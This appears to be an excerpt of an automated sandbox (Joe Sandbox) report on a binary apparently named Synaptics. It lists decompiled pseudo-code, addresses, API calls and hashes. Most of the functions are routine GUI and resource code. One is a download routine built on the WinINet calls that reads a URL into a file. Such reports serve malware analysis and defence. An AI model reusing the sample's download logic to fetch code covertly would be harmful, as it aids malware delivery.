					_push(0x453749);
					return E0043DFA4(_v8);
				} else {
					if(( *(_v8 + 0x98) & 0x00000010) != 0) {
						_t194 =  *0x49ebbc; // 0x21e1320
						_t22 = _t194 + 0x40; // 0x60
						if( *(_v8 + 0x25c) !=  *_t22) {
							_t155 =  *0x49ebbc; // 0x21e1320
							_t25 = _t155 + 0x40; // 0x60
							E00424FF8( *((intOrPtr*)(_v8 + 0x68)), MulDiv(E00424FF0( *((intOrPtr*)(_v8 + 0x68))),  *_t25,  *(_v8 + 0x25c)), __edi, _t202);
						}
					}
					_t117 =  *0x49ebbc; // 0x21e1320
					_t28 = _t117 + 0x40; // 0x60
					 *(_v8 + 0x25c) =  *_t28;
					_t199 = E00453874(_v8);
					_t122 =  *(_v8 + 0x270);
					_t209 = _t199 - _t122;
					if(_t199 != _t122) {
						_t164 = 1;
						E00452B4C(_v8, _t122, _t199);
						E004411C8(_v8,  *(_v8 + 0x270), _t199, _t209);
						if(( *(_v8 + 0x98) & 0x00000004) != 0) {
							 *(_v8 + 0x268) = MulDiv( *(_v8 + 0x268), _t199,  *(_v8 + 0x270));
						}
						if(( *(_v8 + 0x98) & 0x00000008) != 0) {
							 *(_v8 + 0x26c) = MulDiv( *(_v8 + 0x26c), _t199,  *(_v8 + 0x270));
						}
						if(( *(_v8 + 0x98) & 0x00000020) != 0) {
							 *(_v8 + 0x1fa) = MulDiv( *(_v8 + 0x1fa), _t199,  *(_v8 + 0x270));
							 *(_v8 + 0x1fe) = MulDiv( *(_v8 + 0x1fe), _t199,  *(_v8 + 0x270));
						}
					}
					goto L12;
				}
			}

















                                                                                                                                                                                                                            0x004534ec
                                                                                                                                                                                                                            0x004534ed
                                                                                                                                                                                                                            0x004534f4
                                                                                                                                                                                                                            0x004534fa
                                                                                                                                                                                                                            0x00453501
                                                                                                                                                                                                                            0x00453502
                                                                                                                                                                                                                            0x00453507
                                                                                                                                                                                                                            0x0045350a
                                                                                                                                                                                                                            0x00453512
                                                                                                                                                                                                                            0x0045351d
                                                                                                                                                                                                                            0x00453528
                                                                                                                                                                                                                            0x0045352e
                                                                                                                                                                                                                            0x00453530
                                                                                                                                                                                                                            0x0045353a
                                                                                                                                                                                                                            0x00453545
                                                                                                                                                                                                                            0x00453554
                                                                                                                                                                                                                            0x004536b6
                                                                                                                                                                                                                            0x004536b9
                                                                                                                                                                                                                            0x004536bf
                                                                                                                                                                                                                            0x004536c1
                                                                                                                                                                                                                            0x004536c8
                                                                                                                                                                                                                            0x004536c8
                                                                                                                                                                                                                            0x004536d0
                                                                                                                                                                                                                            0x004536d6
                                                                                                                                                                                                                            0x004536d8
                                                                                                                                                                                                                            0x004536df
                                                                                                                                                                                                                            0x004536df
                                                                                                                                                                                                                            0x004536e7
                                                                                                                                                                                                                            0x004536ed
                                                                                                                                                                                                                            0x004536f3
                                                                                                                                                                                                                            0x004536f5
                                                                                                                                                                                                                            0x00453704
                                                                                                                                                                                                                            0x00453716
                                                                                                                                                                                                                            0x00453716
                                                                                                                                                                                                                            0x00453727
                                                                                                                                                                                                                            0x0045372e
                                                                                                                                                                                                                            0x00453731
                                                                                                                                                                                                                            0x00453734
                                                                                                                                                                                                                            0x00453741
                                                                                                                                                                                                                            0x0045356a
                                                                                                                                                                                                                            0x00453574
                                                                                                                                                                                                                            0x0045357f
                                                                                                                                                                                                                            0x00453585
                                                                                                                                                                                                                            0x00453588
                                                                                                                                                                                                                            0x00453594
                                                                                                                                                                                                                            0x00453599
                                                                                                                                                                                                                            0x004535b4
                                                                                                                                                                                                                            0x004535b4
                                                                                                                                                                                                                            0x00453588
                                                                                                                                                                                                                            0x004535b9
                                                                                                                                                                                                                            0x004535be
                                                                                                                                                                                                                            0x004535c4
                                                                                                                                                                                                                            0x004535d2
                                                                                                                                                                                                                            0x004535d7
                                                                                                                                                                                                                            0x004535dd
                                                                                                                                                                                                                            0x004535df
                                                                                                                                                                                                                            0x004535e5
                                                                                                                                                                                                                            0x004535ee
                                                                                                                                                                                                                            0x00453601
                                                                                                                                                                                                                            0x00453610
                                                                                                                                                                                                                            0x0045362f
                                                                                                                                                                                                                            0x0045362f
                                                                                                                                                                                                                            0x0045363f
                                                                                                                                                                                                                            0x0045365e
                                                                                                                                                                                                                            0x0045365e
                                                                                                                                                                                                                            0x0045366e
                                                                                                                                                                                                                            0x0045368d
                                                                                                                                                                                                                            0x004536b0
                                                                                                                                                                                                                            0x004536b0
                                                                                                                                                                                                                            0x0045366e
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004535df

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • MulDiv.KERNEL32(00000000,00000060,00000000), ref: 004535AB
                                                                                                                                                                                                                            • MulDiv.KERNEL32(?,00000000,00000000), ref: 00453627
                                                                                                                                                                                                                            • MulDiv.KERNEL32(?,00000000,00000000), ref: 00453656
                                                                                                                                                                                                                            • MulDiv.KERNEL32(?,00000000,00000000), ref: 00453685
                                                                                                                                                                                                                            • MulDiv.KERNEL32(?,00000000,00000000), ref: 004536A8
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                            • Opcode ID: bf453c4939c3507c7547244688a5841333b77e73213c39d2921ddabae2898744
                                                                                                                                                                                                                            • Instruction ID: c7ec2d223f710dc91b05457c805857c5415938e4303d673742531becb7789678
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: bf453c4939c3507c7547244688a5841333b77e73213c39d2921ddabae2898744
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9171F670A04104EFCB04DFA9C589EADB3F5AF48305F2941FAE808DB362D775AE459B44
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 004348A8 Relevance: 7.6, APIs: 5, Instructions: 83windowCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 77%
                                                                                                                                                                                                                            			E004348A8(void* __eax, void* __ebx, intOrPtr __ecx, int __edx, void* __edi, void* __esi) {
				intOrPtr _v8;
				char _v12;
				int _t21;
				long _t27;
				long _t34;
				int _t42;
				int _t43;
				intOrPtr _t50;
				int _t54;
				void* _t57;
				void* _t60;

				_v12 = 0;
				_v8 = __ecx;
				_t54 = __edx;
				_t57 = __eax;
				_push(_t60);
				_push(0x434993);
				_push( *[fs:eax]);
				 *[fs:eax] = _t60 + 0xfffffff8;
				if(__edx >= 0) {
					_t21 = SendMessageA(E00441704( *((intOrPtr*)(__eax + 0x10))), 0xbb, __edx, 0); // executed
					_t42 = _t21;
					if(_t42 < 0) {
						_t43 = SendMessageA(E00441704( *((intOrPtr*)(_t57 + 0x10))), 0xbb, _t54 - 1, 0);
						if(_t43 >= 0) {
							_t27 = SendMessageA(E00441704( *((intOrPtr*)(_t57 + 0x10))), 0xc1, _t43, 0);
							if(_t27 != 0) {
								_t42 = _t43 + _t27;
								E00404CCC( &_v12, _v8, 0x4349ac);
								goto L6;
							}
						}
					} else {
						E00404CCC( &_v12, 0x4349ac, _v8);
						L6:
						SendMessageA(E00441704( *((intOrPtr*)(_t57 + 0x10))), 0xb1, _t42, _t42); // executed
						_t34 = E00404E80(_v12);
						SendMessageA(E00441704( *((intOrPtr*)(_t57 + 0x10))), 0xc2, 0, _t34); // executed
					}
				}
				_pop(_t50);
				 *[fs:eax] = _t50;
				_push(0x43499a);
				return E004049C0( &_v12);
			}














                                                                                                                                                                                                                            0x004348b3
                                                                                                                                                                                                                            0x004348b6
                                                                                                                                                                                                                            0x004348b9
                                                                                                                                                                                                                            0x004348bb
                                                                                                                                                                                                                            0x004348bf
                                                                                                                                                                                                                            0x004348c0
                                                                                                                                                                                                                            0x004348c5
                                                                                                                                                                                                                            0x004348c8
                                                                                                                                                                                                                            0x004348cd
                                                                                                                                                                                                                            0x004348e4
                                                                                                                                                                                                                            0x004348e9
                                                                                                                                                                                                                            0x004348ed
                                                                                                                                                                                                                            0x00434918
                                                                                                                                                                                                                            0x0043491c
                                                                                                                                                                                                                            0x0043492f
                                                                                                                                                                                                                            0x00434936
                                                                                                                                                                                                                            0x00434938
                                                                                                                                                                                                                            0x00434945
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00434945
                                                                                                                                                                                                                            0x00434936
                                                                                                                                                                                                                            0x004348ef
                                                                                                                                                                                                                            0x004348fa
                                                                                                                                                                                                                            0x0043494a
                                                                                                                                                                                                                            0x0043495a
                                                                                                                                                                                                                            0x00434962
                                                                                                                                                                                                                            0x00434978
                                                                                                                                                                                                                            0x00434978
                                                                                                                                                                                                                            0x004348ed
                                                                                                                                                                                                                            0x0043497f
                                                                                                                                                                                                                            0x00434982
                                                                                                                                                                                                                            0x00434985
                                                                                                                                                                                                                            0x00434992

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • SendMessageA.USER32(00000000,000000BB,?,00000000), ref: 004348E4
                                                                                                                                                                                                                            • SendMessageA.USER32(00000000,000000BB,?,00000000), ref: 00434913
                                                                                                                                                                                                                            • SendMessageA.USER32(00000000,000000C1,00000000,00000000), ref: 0043492F
                                                                                                                                                                                                                            • SendMessageA.USER32(00000000,000000B1,00000000,00000000), ref: 0043495A
                                                                                                                                                                                                                            • SendMessageA.USER32(00000000,000000C2,00000000,00000000), ref: 00434978
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: MessageSend
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3850602802-0
                                                                                                                                                                                                                            • Opcode ID: ffe0ecfc46be5565c031e4ce40711d918fc9cf30ddcbd8c6808e49f6dfa3db42
                                                                                                                                                                                                                            • Instruction ID: 60fe2270a456efbc5898118594648b470be5076c4c12df513f5ffd0388d1f25b
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ffe0ecfc46be5565c031e4ce40711d918fc9cf30ddcbd8c6808e49f6dfa3db42
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A5219BB1644704ABE710ABB6CC82F9B76ACEF84718F10453EB501A73D2DB78BD00C559
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 00454A44 Relevance: 6.1, APIs: 4, Instructions: 148windowCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 89%
                                                                                                                                                                                                                            			E00454A44(void* __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				void* _t41;
				void* _t54;
				void* _t61;
				struct HMENU__* _t64;
				struct HMENU__* _t70;
				intOrPtr _t77;
				void* _t79;
				intOrPtr _t81;
				intOrPtr _t83;
				intOrPtr _t87;
				void* _t92;
				intOrPtr _t98;
				void* _t111;
				intOrPtr _t113;
				void* _t116;

				_t109 = __edi;
				_push(__edi);
				_v20 = 0;
				_t113 = __edx;
				_t92 = __eax;
				_push(_t116);
				_push(0x454c0a);
				_push( *[fs:eax]);
				 *[fs:eax] = _t116 + 0xfffffff0;
				if(__edx == 0) {
					L7:
					_t39 =  *((intOrPtr*)(_t92 + 0x248));
					if( *((intOrPtr*)(_t92 + 0x248)) != 0) {
						E0044E3BC(_t39, 0, _t109, 0);
					}
					if(( *(_t92 + 0x1c) & 0x00000008) != 0 || _t113 != 0 && ( *(_t113 + 0x1c) & 0x00000008) != 0) {
						_t113 = 0;
					}
					 *((intOrPtr*)(_t92 + 0x248)) = _t113;
					if(_t113 != 0) {
						E00421C0C(_t113, _t92);
					}
					if(_t113 == 0 || ( *(_t92 + 0x1c) & 0x00000010) == 0 &&  *((char*)(_t92 + 0x229)) == 3) {
						_t41 = E00441A08(_t92);
						__eflags = _t41;
						if(_t41 != 0) {
							SetMenu(E00441704(_t92), 0); // executed
						}
						goto L30;
					} else {
						if( *((char*)( *((intOrPtr*)(_t92 + 0x248)) + 0x5c)) != 0 ||  *((char*)(_t92 + 0x22f)) == 1) {
							if(( *(_t92 + 0x1c) & 0x00000010) == 0) {
								__eflags =  *((char*)(_t92 + 0x22f)) - 1;
								if( *((char*)(_t92 + 0x22f)) != 1) {
									_t54 = E00441A08(_t92);
									__eflags = _t54;
									if(_t54 != 0) {
										SetMenu(E00441704(_t92), 0);
									}
								}
								goto L30;
							}
							goto L21;
						} else {
							L21:
							if(E00441A08(_t92) != 0) {
								_t61 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t92 + 0x248)))) + 0x34))();
								_t110 = _t61;
								_t64 = GetMenu(E00441704(_t92));
								_t138 = _t61 - _t64;
								if(_t61 != _t64) {
									_t70 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t92 + 0x248)))) + 0x34))();
									SetMenu(E00441704(_t92), _t70);
								}
								E0044E3BC(_t113, E00441704(_t92), _t110, _t138);
							}
							L30:
							if( *((char*)(_t92 + 0x22e)) != 0) {
								E00455B08(_t92, 1);
							}
							E0045497C(_t92);
							_pop(_t98);
							 *[fs:eax] = _t98;
							_push(0x454c11);
							return E004049C0( &_v20);
						}
					}
				}
				_t77 =  *0x49ebbc; // 0x21e1320
				_t79 = E00458274(_t77) - 1;
				if(_t79 >= 0) {
					_v8 = _t79 + 1;
					_t111 = 0;
					do {
						_t81 =  *0x49ebbc; // 0x21e1320
						if(_t113 ==  *((intOrPtr*)(E00458260(_t81, _t111) + 0x248))) {
							_t83 =  *0x49ebbc; // 0x21e1320
							if(_t92 != E00458260(_t83, _t111)) {
								_v16 =  *((intOrPtr*)(_t113 + 8));
								_v12 = 0xb;
								_t87 =  *0x49d8b4; // 0x423118
								E00406A70(_t87,  &_v20);
								E0040D180(_t92, _v20, 1, _t111, _t113, 0,  &_v16);
								E00404378();
							}
						}
						_t111 = _t111 + 1;
						_t10 =  &_v8;
						 *_t10 = _v8 - 1;
					} while ( *_t10 != 0);
				}
			}






















                                                                                                                                                                                                                            0x00454a44
                                                                                                                                                                                                                            0x00454a4c
                                                                                                                                                                                                                            0x00454a4f
                                                                                                                                                                                                                            0x00454a52
                                                                                                                                                                                                                            0x00454a54
                                                                                                                                                                                                                            0x00454a58
                                                                                                                                                                                                                            0x00454a59
                                                                                                                                                                                                                            0x00454a5e
                                                                                                                                                                                                                            0x00454a61
                                                                                                                                                                                                                            0x00454a66
                                                                                                                                                                                                                            0x00454ad8
                                                                                                                                                                                                                            0x00454ad8
                                                                                                                                                                                                                            0x00454ae0
                                                                                                                                                                                                                            0x00454ae4
                                                                                                                                                                                                                            0x00454ae4
                                                                                                                                                                                                                            0x00454aed
                                                                                                                                                                                                                            0x00454af9
                                                                                                                                                                                                                            0x00454af9
                                                                                                                                                                                                                            0x00454afb
                                                                                                                                                                                                                            0x00454b03
                                                                                                                                                                                                                            0x00454b09
                                                                                                                                                                                                                            0x00454b09
                                                                                                                                                                                                                            0x00454b10
                                                                                                                                                                                                                            0x00454bc3
                                                                                                                                                                                                                            0x00454bc8
                                                                                                                                                                                                                            0x00454bca
                                                                                                                                                                                                                            0x00454bd6
                                                                                                                                                                                                                            0x00454bd6
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00454b29
                                                                                                                                                                                                                            0x00454b33
                                                                                                                                                                                                                            0x00454b42
                                                                                                                                                                                                                            0x00454b9c
                                                                                                                                                                                                                            0x00454ba3
                                                                                                                                                                                                                            0x00454ba7
                                                                                                                                                                                                                            0x00454bac
                                                                                                                                                                                                                            0x00454bae
                                                                                                                                                                                                                            0x00454bba
                                                                                                                                                                                                                            0x00454bba
                                                                                                                                                                                                                            0x00454bae
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00454ba3
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00454b44
                                                                                                                                                                                                                            0x00454b44
                                                                                                                                                                                                                            0x00454b4d
                                                                                                                                                                                                                            0x00454b5b
                                                                                                                                                                                                                            0x00454b5e
                                                                                                                                                                                                                            0x00454b68
                                                                                                                                                                                                                            0x00454b6d
                                                                                                                                                                                                                            0x00454b6f
                                                                                                                                                                                                                            0x00454b79
                                                                                                                                                                                                                            0x00454b85
                                                                                                                                                                                                                            0x00454b85
                                                                                                                                                                                                                            0x00454b95
                                                                                                                                                                                                                            0x00454b95
                                                                                                                                                                                                                            0x00454bdb
                                                                                                                                                                                                                            0x00454be2
                                                                                                                                                                                                                            0x00454be8
                                                                                                                                                                                                                            0x00454be8
                                                                                                                                                                                                                            0x00454bef
                                                                                                                                                                                                                            0x00454bf6
                                                                                                                                                                                                                            0x00454bf9
                                                                                                                                                                                                                            0x00454bfc
                                                                                                                                                                                                                            0x00454c09
                                                                                                                                                                                                                            0x00454c09
                                                                                                                                                                                                                            0x00454b33
                                                                                                                                                                                                                            0x00454b10
                                                                                                                                                                                                                            0x00454a68
                                                                                                                                                                                                                            0x00454a72
                                                                                                                                                                                                                            0x00454a75
                                                                                                                                                                                                                            0x00454a78
                                                                                                                                                                                                                            0x00454a7b
                                                                                                                                                                                                                            0x00454a7d
                                                                                                                                                                                                                            0x00454a7f
                                                                                                                                                                                                                            0x00454a8f
                                                                                                                                                                                                                            0x00454a93
                                                                                                                                                                                                                            0x00454a9f
                                                                                                                                                                                                                            0x00454aa4
                                                                                                                                                                                                                            0x00454aa7
                                                                                                                                                                                                                            0x00454ab4
                                                                                                                                                                                                                            0x00454ab9
                                                                                                                                                                                                                            0x00454ac8
                                                                                                                                                                                                                            0x00454acd
                                                                                                                                                                                                                            0x00454acd
                                                                                                                                                                                                                            0x00454a9f
                                                                                                                                                                                                                            0x00454ad2
                                                                                                                                                                                                                            0x00454ad3
                                                                                                                                                                                                                            0x00454ad3
                                                                                                                                                                                                                            0x00454ad3
                                                                                                                                                                                                                            0x00454a7d

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetMenu.USER32(00000000), ref: 00454B68
                                                                                                                                                                                                                            • SetMenu.USER32(00000000,00000000), ref: 00454B85
                                                                                                                                                                                                                            • SetMenu.USER32(00000000,00000000), ref: 00454BBA
                                                                                                                                                                                                                            • SetMenu.USER32(00000000,00000000,00000000,00454C0A), ref: 00454BD6
                                                                                                                                                                                                                              • Part of subcall function 00406A70: LoadStringA.USER32 ref: 00406AA1
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Menu$LoadString
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3688185913-0
                                                                                                                                                                                                                            • Opcode ID: 9ef444e933b09877c328c4c92fa3845e43b2cad6075fb8db61f2460728ee00b7
                                                                                                                                                                                                                            • Instruction ID: 8074770e88abfcf8b34beed0e108b3c66a7315ec12ddf3ed763e984ff9a80418
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9ef444e933b09877c328c4c92fa3845e43b2cad6075fb8db61f2460728ee00b7
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 21518130A043445ADB61EF6A888575A7AA4AB8430DF0545BBEC059F3A3CA7CEC89875D
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 00474D50 Relevance: 6.1, APIs: 4, Instructions: 90networkfileCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 64%
                                                                                                                                                                                                                            			E00474D50(void* __eax, void* __ebx, intOrPtr __edx, void* __esi) {
				intOrPtr _v8;
				char _v9;
				void* _v16;
				void* _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				void _v1060;
				char _v1392;
				char _v1856;
				void* _t32;
				void* _t37;
				void* _t48;
				DWORD* _t57;
				intOrPtr _t68;
				void* _t70;
				void* _t72;
				void* _t73;
				intOrPtr _t74;

				_t72 = _t73;
				_t74 = _t73 + 0xfffff8c4;
				_v1856 = 0;
				_v28 = 0;
				_v32 = 0;
				_v36 = 0;
				_v8 = __edx;
				_t70 = __eax;
				_t57 =  &_v24;
				_push(_t72);
				_push(0x474f77);
				_push( *[fs:eax]);
				 *[fs:eax] = _t74;
				E00402B68(0,  &_v1856);
				E00409E18(_v1856,  &_v28);
				_t32 = InternetOpenA(E00404E80(_v28), 0, 0, 0, 0); // executed
				_v16 = _t32;
				_push(_t72);
				_push(0x474e92);
				_push( *[fs:eax]);
				 *[fs:eax] = _t74;
				_t37 = InternetOpenUrlA(_v16, E00404E80(_t70), 0, 0, 0x84000000, 0); // executed
				_v20 = _t37;
				_push(_t72);
				_push(0x474e74);
				_push( *[fs:eax]);
				 *[fs:eax] = _t74;
				E00402F1C( &_v1392, _v8, 0);
				E004028C4(E004035E4());
				do {
					InternetReadFile(_v20,  &_v1060, 0x400, _t57); // executed
					_t48 = E0040306C(0); // executed
					E004028C4(_t48);
				} while ( *_t57 != 0);
				E004028C4(E0040308C( &_v1392));
				_v9 = 1;
				_pop(_t68);
				 *[fs:eax] = _t68;
				_push(E00474E7B);
				return InternetCloseHandle(_v20);
			}























                                                                                                                                                                                                                            0x00474d51
                                                                                                                                                                                                                            0x00474d53
                                                                                                                                                                                                                            0x00474d5d
                                                                                                                                                                                                                            0x00474d63
                                                                                                                                                                                                                            0x00474d66
                                                                                                                                                                                                                            0x00474d69
                                                                                                                                                                                                                            0x00474d6c
                                                                                                                                                                                                                            0x00474d6f
                                                                                                                                                                                                                            0x00474d71
                                                                                                                                                                                                                            0x00474d76
                                                                                                                                                                                                                            0x00474d77
                                                                                                                                                                                                                            0x00474d7c
                                                                                                                                                                                                                            0x00474d7f
                                                                                                                                                                                                                            0x00474d8a
                                                                                                                                                                                                                            0x00474d98
                                                                                                                                                                                                                            0x00474dae
                                                                                                                                                                                                                            0x00474db3
                                                                                                                                                                                                                            0x00474db8
                                                                                                                                                                                                                            0x00474db9
                                                                                                                                                                                                                            0x00474dbe
                                                                                                                                                                                                                            0x00474dc1
                                                                                                                                                                                                                            0x00474ddb
                                                                                                                                                                                                                            0x00474de0
                                                                                                                                                                                                                            0x00474de5
                                                                                                                                                                                                                            0x00474de6
                                                                                                                                                                                                                            0x00474deb
                                                                                                                                                                                                                            0x00474dee
                                                                                                                                                                                                                            0x00474dfa
                                                                                                                                                                                                                            0x00474e0f
                                                                                                                                                                                                                            0x00474e14
                                                                                                                                                                                                                            0x00474e25
                                                                                                                                                                                                                            0x00474e3a
                                                                                                                                                                                                                            0x00474e3f
                                                                                                                                                                                                                            0x00474e44
                                                                                                                                                                                                                            0x00474e54
                                                                                                                                                                                                                            0x00474e59
                                                                                                                                                                                                                            0x00474e5f
                                                                                                                                                                                                                            0x00474e62
                                                                                                                                                                                                                            0x00474e65
                                                                                                                                                                                                                            0x00474e73

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                              • Part of subcall function 00402B68: GetModuleFileNameA.KERNEL32(00000000,?,00000105), ref: 00402B8C
                                                                                                                                                                                                                            • InternetOpenA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00474DAE
                                                                                                                                                                                                                            • InternetOpenUrlA.WININET(00000001,00000000,00000000,00000000,84000000,00000000), ref: 00474DDB
                                                                                                                                                                                                                            • InternetReadFile.WININET(?,?,00000400,?), ref: 00474E25
                                                                                                                                                                                                                            • InternetCloseHandle.WININET(?), ref: 00474E6E
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Internet$FileOpen$CloseHandleModuleNameRead
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1785656124-0
                                                                                                                                                                                                                            • Opcode ID: 55f5dc7776fc9cc51cd03a9ca73dbc10e30324fa73b2847c15f1e53668a756e6
                                                                                                                                                                                                                            • Instruction ID: 9dd8df19d1045a063bc6dcad90270211b168fb7c8f28217f7d4554014ce166d6
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 55f5dc7776fc9cc51cd03a9ca73dbc10e30324fa73b2847c15f1e53668a756e6
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8D318670A00218ABDB11DFA5DC52BAEB7B8EB48704F91447AF504B72C1D7786A00CF68
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 0041E198 Relevance: 6.1, APIs: 4, Instructions: 51COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 82%
                                                                                                                                                                                                                            			E0041E198(void* __eax, struct HINSTANCE__* __edx, CHAR* _a4) {
				CHAR* _v8;
				void* __ebx;
				void* __ecx;
				void* __edi;
				void* __esi;
				void* __ebp;
				struct HRSRC__* _t12;
				void* _t18;
				void* _t23;
				CHAR* _t24;
				void* _t25;
				struct HRSRC__* _t29;
				void* _t30;
				struct HINSTANCE__* _t31;
				void* _t32;

				_v8 = _t24;
				_t31 = __edx;
				_t23 = __eax;
				_t12 = FindResourceA(__edx, _v8, _a4); // executed
				_t29 = _t12;
				 *(_t23 + 0x10) = _t29;
				_t33 = _t29;
				if(_t29 == 0) {
					E0041E128(_t23, _t24, _t29, _t31, _t33, _t32);
					_pop(_t24);
				}
				_t5 = _t23 + 0x10; // 0x41e23c
				_t30 = LoadResource(_t31,  *_t5);
				 *(_t23 + 0x14) = _t30;
				_t34 = _t30;
				if(_t30 == 0) {
					E0041E128(_t23, _t24, _t30, _t31, _t34, _t32);
				}
				_t7 = _t23 + 0x10; // 0x41e23c
				_push(SizeofResource(_t31,  *_t7));
				_t8 = _t23 + 0x14; // 0x41dd60
				_t18 = LockResource( *_t8);
				_pop(_t25);
				return E0041DD20(_t23, _t25, _t18);
			}


















                                                                                                                                                                                                                            0x0041e19f
                                                                                                                                                                                                                            0x0041e1a2
                                                                                                                                                                                                                            0x0041e1a4
                                                                                                                                                                                                                            0x0041e1af
                                                                                                                                                                                                                            0x0041e1b4
                                                                                                                                                                                                                            0x0041e1b6
                                                                                                                                                                                                                            0x0041e1b9
                                                                                                                                                                                                                            0x0041e1bb
                                                                                                                                                                                                                            0x0041e1be
                                                                                                                                                                                                                            0x0041e1c3
                                                                                                                                                                                                                            0x0041e1c3
                                                                                                                                                                                                                            0x0041e1c4
                                                                                                                                                                                                                            0x0041e1ce
                                                                                                                                                                                                                            0x0041e1d0
                                                                                                                                                                                                                            0x0041e1d3
                                                                                                                                                                                                                            0x0041e1d5
                                                                                                                                                                                                                            0x0041e1d8
                                                                                                                                                                                                                            0x0041e1dd
                                                                                                                                                                                                                            0x0041e1de
                                                                                                                                                                                                                            0x0041e1e8
                                                                                                                                                                                                                            0x0041e1e9
                                                                                                                                                                                                                            0x0041e1ed
